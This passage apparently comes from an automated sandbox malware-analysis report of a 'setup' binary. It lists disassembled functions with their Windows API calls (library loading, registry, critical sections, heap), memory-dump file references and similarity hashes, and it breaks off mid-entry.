                                                                                                                                                                              Function 00BAF828 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 166libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAF96B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF9B4
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,DllGetActivationFactory,00000002,00000000,?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAFA02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: .dll$DllGetActivationFactory
                                                                                                                                                                              • API String ID: 145871493-1250754257
                                                                                                                                                                              • Opcode ID: 2c7c322545c27fdfd145e46aedc29a45c446b3d5c7335f2d74fc209ee3a10ffd
                                                                                                                                                                              • Instruction ID: b902582a813f815405e5a649fd56e56b2c22eb6699b27c664b39acebf2be6c37
                                                                                                                                                                              • Opcode Fuzzy Hash: 2c7c322545c27fdfd145e46aedc29a45c446b3d5c7335f2d74fc209ee3a10ffd
                                                                                                                                                                              • Instruction Fuzzy Hash: EE615D30D0820AEEDF14DFA8C895BFDB7F1EF15300F2481A9E415A7291EB749A45CB61
                                                                                                                                                                              Function 00BAF84C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAF96B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF9B4
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,DllGetActivationFactory,00000002,00000000,?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAFA02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: .dll$DllGetActivationFactory
                                                                                                                                                                              • API String ID: 145871493-1250754257
                                                                                                                                                                              • Opcode ID: 10ad0eb947153b09064dffe9335a08d3674c6e393394a8829c2b6621656c8fb9
                                                                                                                                                                              • Instruction ID: 05a4d00eca3899bc36a1d687f518ce20c759c06169d00350e32f45e74f318b05
                                                                                                                                                                              • Opcode Fuzzy Hash: 10ad0eb947153b09064dffe9335a08d3674c6e393394a8829c2b6621656c8fb9
                                                                                                                                                                              • Instruction Fuzzy Hash: CD414F30D0420AEEDF24DFA8C894AFEB7F1EF55300F2581A9D015A71A1EB74DA45CB61
                                                                                                                                                                              Function 00CB6AB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96registrylibraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,E5106CA8,E5106CA8,?,?,?,?,00DA82C0,000000FF), ref: 00CB6AF3
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00CB6B1C
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,00DA82C0,000000FF), ref: 00CB6B7C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                              • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                                                                              • API String ID: 4190037839-2994018265
                                                                                                                                                                              • Opcode ID: ad5e5e4a1d5982207da7c0792305d734f40d75811c291323793eb08f82a81682
                                                                                                                                                                              • Instruction ID: f090594386b7de1b0776b7878d8da3e0af42ce0e3a55a7d113e1a158c9c89312
                                                                                                                                                                              • Opcode Fuzzy Hash: ad5e5e4a1d5982207da7c0792305d734f40d75811c291323793eb08f82a81682
                                                                                                                                                                              • Instruction Fuzzy Hash: B0318E72744205AFEB248F45DC45FEABBB8FB08750F10412AF915E7280E779A904DAA4
                                                                                                                                                                              Function 00CCF120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(ComCtl32.dll,E5106CA8,?,00000007,00000007), ref: 00CCF15E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCF181
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00CCF1FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: ComCtl32.dll$LoadIconMetric
                                                                                                                                                                              • API String ID: 145871493-764666640
                                                                                                                                                                              • Opcode ID: 47d71e4d4a282453aa86fcb735ad9c035639e7b24bcbe8b1ba55f1fb29fad3d0
                                                                                                                                                                              • Instruction ID: 438acd16002b8f76743fb5b3025aeb98f5524fd342a156c57344fd51a57c872d
                                                                                                                                                                              • Opcode Fuzzy Hash: 47d71e4d4a282453aa86fcb735ad9c035639e7b24bcbe8b1ba55f1fb29fad3d0
                                                                                                                                                                              • Instruction Fuzzy Hash: 73314FB1A00259EFEB109F96DC44BAFBBF8EB48750F14422EE915E7290D7758A05CB90
                                                                                                                                                                              Function 00BB2551 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB2592
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB25DA
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BB2617
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionCreateDirectoryVariableWake
                                                                                                                                                                              • String ID: xi$xi
                                                                                                                                                                              • API String ID: 2312781895-3471652813
                                                                                                                                                                              • Opcode ID: c4facf971391dc0afbfc3231dad2f97d3183aa0394123aaada6929944470c673
                                                                                                                                                                              • Instruction ID: 1c6834281980615585c478b333adfbcd80a1b6222ef8a0d3c452310e938827c2
                                                                                                                                                                              • Opcode Fuzzy Hash: c4facf971391dc0afbfc3231dad2f97d3183aa0394123aaada6929944470c673
                                                                                                                                                                              • Instruction Fuzzy Hash: AE21A4719403099BC724EBA4DD0A7AE77B0EB9A720F1442A5E4627B2D1D7B06908C762
                                                                                                                                                                              Function 00D8B56C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E5106CA8,00000001,?,00000000,00E0A459,000000FF,?,00D8B4FC,?,?,00D8B4D0,00000016), ref: 00D8B5A1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D8B5B3
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00E0A459,000000FF,?,00D8B4FC,?,?,00D8B4D0,00000016), ref: 00D8B5D5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                              • Opcode ID: 4fb39bfe22fc54c097f482e74a368542dca1cb2403541a964f4b346b531a9ac5
                                                                                                                                                                              • Instruction ID: 7f7e3aab9160a244316860c9f306b200e0b58a17f6c9b465a7b957037d637837
                                                                                                                                                                              • Opcode Fuzzy Hash: 4fb39bfe22fc54c097f482e74a368542dca1cb2403541a964f4b346b531a9ac5
                                                                                                                                                                              • Instruction Fuzzy Hash: 6701D631940759EFDB019F91DC09BAEBBB8FB04B20F144626F811F26E0DB759948CB90
                                                                                                                                                                              Function 00D802E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SleepConditionVariableCS.KERNELBASE(?,00D80285,00000064), ref: 00D8030B
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF), ref: 00D80315
                                                                                                                                                                              • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF), ref: 00D80326
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00E9FF6C,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177), ref: 00D8032D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3269011525-3261393531
                                                                                                                                                                              • Opcode ID: 291315e3188975fc95853fa6af841e7d601c412be067e8b98e1a1d378f501d2c
                                                                                                                                                                              • Instruction ID: 1da403310039d3db65478d6e5977aae82dbbcf87aead0d25ca56e5722cba9e89
                                                                                                                                                                              • Opcode Fuzzy Hash: 291315e3188975fc95853fa6af841e7d601c412be067e8b98e1a1d378f501d2c
                                                                                                                                                                              • Instruction Fuzzy Hash: 70E01B31B45628AFCA113B91FC0998D3E189B067517215231F549F51708B635895CBD4
                                                                                                                                                                              Function 00CC5040 Relevance: 7.6, APIs: 5, Instructions: 122COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00CC5074
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00CC5096
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC50BE
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00CC51A7
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC51D1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 459529453-0
                                                                                                                                                                              • Opcode ID: 37167683fb95009c6d1dff7faede0c7bb1863fed9dd076e7b29d7b584f07edba
                                                                                                                                                                              • Instruction ID: a077d0da287379fddd955ab4f8806a843e630263d22bb8e24bca93a090357fd8
                                                                                                                                                                              • Opcode Fuzzy Hash: 37167683fb95009c6d1dff7faede0c7bb1863fed9dd076e7b29d7b584f07edba
                                                                                                                                                                              • Instruction Fuzzy Hash: 6D518B70A00648DFDB11CF58C845BAEBBB0EF41354F28815DE855AB381EBB5BA45CBE1
                                                                                                                                                                              Function 00BB0B20 Relevance: 7.6, APIs: 5, Instructions: 60memorywindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BB0B6A
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BB0B70
                                                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00BB0B93
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00DA9C66,000000FF), ref: 00BB0BBB
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00DA9C66,000000FF), ref: 00BB0BC1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$FreeProcess$FormatMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1606019998-0
                                                                                                                                                                              • Opcode ID: 2458fd7a3b939283796279471b8499bda024796f916c7b5d8b5c9097691a809f
                                                                                                                                                                              • Instruction ID: 4c72ad8df1ac0d994be61b6cd470cea5354dc329d8e50f52d83444b80a503fc9
                                                                                                                                                                              • Opcode Fuzzy Hash: 2458fd7a3b939283796279471b8499bda024796f916c7b5d8b5c9097691a809f
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A1151B1A14219ABEB10EBA4CD01BAFB7F8EB04B04F104519F514A72C1D7F59A048BA0
                                                                                                                                                                              Function 00BAD4FE Relevance: 7.5, APIs: 5, Instructions: 46synchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?), ref: 00BAD501
                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00BAD51E
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BAD528
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BAD53F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 590199018-0
                                                                                                                                                                              • Opcode ID: 1b13f7dd3e8c9f19cb7147f79917fed8f6034f652e70338d8abc5d4c396680b2
                                                                                                                                                                              • Instruction ID: e40148b4690231c3aa420572c26d4901d0656286cea6015c4d81a3a035d9ff6d
                                                                                                                                                                              • Opcode Fuzzy Hash: 1b13f7dd3e8c9f19cb7147f79917fed8f6034f652e70338d8abc5d4c396680b2
                                                                                                                                                                              • Instruction Fuzzy Hash: 8C016DB2D04505CFDB109BA9DC0526DBBB5EF96334B2443A5E826E36E0E7319C95CA90
                                                                                                                                                                              Function 00BC27D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 204COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(*.*,?,?,?,E5106CA8,?), ref: 00BC28B5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path
                                                                                                                                                                              • String ID: *.*$\\?\$\\?\UNC\
                                                                                                                                                                              • API String ID: 2875597873-1700010636
                                                                                                                                                                              • Opcode ID: fedeeca82e03099af3fe4ef875e145c21761316a53e7ca10b6c1b5c779bc7a65
                                                                                                                                                                              • Instruction ID: adf04f4d7f162259ea93ee6e5c2f48cb5dabde90177ebdb02fbd6d426c60c9f1
                                                                                                                                                                              • Opcode Fuzzy Hash: fedeeca82e03099af3fe4ef875e145c21761316a53e7ca10b6c1b5c779bc7a65
                                                                                                                                                                              • Instruction Fuzzy Hash: C6710171A006099BDB10DF68C849FAAF3FAFF54724F1482ADE415DB291DBB69D40CB90
                                                                                                                                                                              Function 00CFFCA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 167COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DEF97F,000000FF), ref: 00CFFE23
                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DEF97F,000000FF), ref: 00CFFEB1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
